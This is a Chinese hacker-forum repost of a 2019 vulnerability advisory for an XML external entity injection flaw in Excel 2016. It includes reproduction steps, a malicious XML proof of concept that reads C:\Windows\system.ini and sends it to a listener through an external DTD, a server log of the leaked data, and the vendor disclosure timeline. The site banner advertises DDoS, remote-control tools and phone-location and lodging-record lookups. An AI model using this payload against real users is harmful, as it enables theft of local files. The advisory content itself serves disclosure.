注册忘记密码

黑客论坛,黑客工具,黑客教程,QQ技术,黑客基地,黑客网络,黑客软件,黑客联盟,免杀,远控,ddos,cc,黑客攻防,黑客编程,黑客定位,手机定位,微信定位,hack,黑客网站,查开房,定位,信息查询

查看: 260|回复: 0

[网络安全] Microsoft Excel 2016 1901 - XML 外部实体注入漏洞

[复制链接]
   0 UID
   0帖子
   0精华
21
   0威望
500
   0金币
44899
   0贡献
5000
   0阅读权限
   200
   积分
   0
   在线时间
   534 小时
   最后登录
   2019-12-14
发表于 2019-12-3 01:17:57 来自手机 | 显示全部楼层 |阅读模式
+] 漏洞作者: John Page (花名 hyp3rlinx)
[+] 日期: 2019-12-02
[+] 厂商: www.microsoft.com
[+] 测试平台:Windows 10 .NET framework version v4.0.30319.   
[+] CVE: 无


[漏洞作者]
hyp3rlinx,原名John Page,公布了很多有意思的漏洞。在10月下旬,Hackerhub公众号也发布过他公布的WinRAR XML 注入漏洞:
WinRAR XML 注入
当然,这也是一个没有CVE号的漏洞,需要用户配合才能触发,所以也是鸡肋,今天的Excel XML注入漏洞也一样。

[Product]
Excel 2016 v1901

微软的Excel是一款家喻户晓的电子表格程序,由Microsft公司打造,支持的平台涵括Windows、MacOS,Android和iOS。

[CVE]



[漏洞类型]
基于错误导入方式的XML 外部实体注入漏洞

[安全问题]
Excel从文件检索的功能受基于错误导入方式的XML 外部实体注入漏洞影响,这个漏洞可以在出现错误时使用“以html网页导入”,导入一个精心制作的XML文件来触发。

这可能会导致本地文件被远程获取,但这个漏洞的触发需要用户的交互才能实现。
于Windows 10 .NET framework version v4.0.30319测试成功。

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319


[漏洞利用/POC]
创建一个“.xlsx”文件,然后去到菜单栏的“数据”--'新建查询'--'来自文件‘ --‘来自XML’

1)你会得到类似这样一个错误:
“错误“
链接不上
我们在尝试链接时遇到了错误。
用户稍后会得到一个选项去“编辑“,在这里用户可以以html文件的方式上传一个文件。
最终会导致本地的文件传至远程服务器。

2)服务端会收到类似这样的内容:
127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
/1.1" 200 -


恶意的XML文件,用来在数据查询时导入的文件:
"test.xml"
<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
<pwn>&send;</pwn>

[网络访问]
本地

[安全级别]


[披露时间线]
通知厂商时间:2019,5月10日
微软应急响应中心:2019,5月17日回复 “本例未能满足安全漏洞发布(Security Release)标准”,工程团队可能会也可能不会在未来的版本中修复这个问题。


这漏洞的类似利用方式,可以参考之前的XML注入漏洞利用:
WinRAR XML 注入

发表回复

您需要登录后才可以回帖 登录 | 注册会员

本版积分规则


快速回复 返回顶部 返回列表